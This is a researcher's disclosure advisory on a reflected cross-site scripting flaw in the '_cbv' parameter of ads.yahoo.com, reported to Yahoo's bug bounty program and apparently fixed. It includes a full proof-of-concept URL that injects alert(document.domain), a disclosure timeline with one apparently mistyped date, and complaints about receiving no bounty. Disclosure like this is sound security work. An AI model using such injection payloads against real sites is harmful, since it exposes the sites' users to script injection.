Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com
In Nov ’13 I reported a Cross-site Scripting vulnerability to the Yahoo Bug Bounty Program. As with my other reports, I got no response or feedback, so this time I wrote them a message via email, and so on … blah blah :)
To cut a long story short: for all my reports the communication with Yahoo was really bad and, of course, no bounty!
It seems this XSS is fixed, so here is my advisory:
Advisory: Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com
Advisory ID: SSCHADV2013-YahooBB-001
Author: Stefan Schurtz
Affected Software: Successfully tested on ads.yahoo.com
Vendor URL:
Vendor Status: Seems to be fixed
Bounty: nothing
======================
Vulnerability Description
======================
The ‘_cbv’ parameter on "http://ads.yahoo.com" is prone to a Cross-site Scripting vulnerability.
======================
PoC-Exploit
======================
http://ads.yahoo.com/st?ad_type=iframe&ad_size=300x250&site=1181425&section_code=112260532&cb=1385497647.226089&publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4|2143911627|LREC2|1385497647.226089&yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtPOVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r68cRSLiFUFzH_pvnaxUy8-&_msd=1&_xcf=1&_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV&_msig=10sorm5kd&rmxbkn=0&_cbv=132025816&81c91"-alert(document.domain)-"1580bfdcb31=1
======================
Disclosure Timeline
======================
28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 – next message to the Yahoo Security Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 – contact with Jeff Zingler (Threat Response@Yahoo) // last contact
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt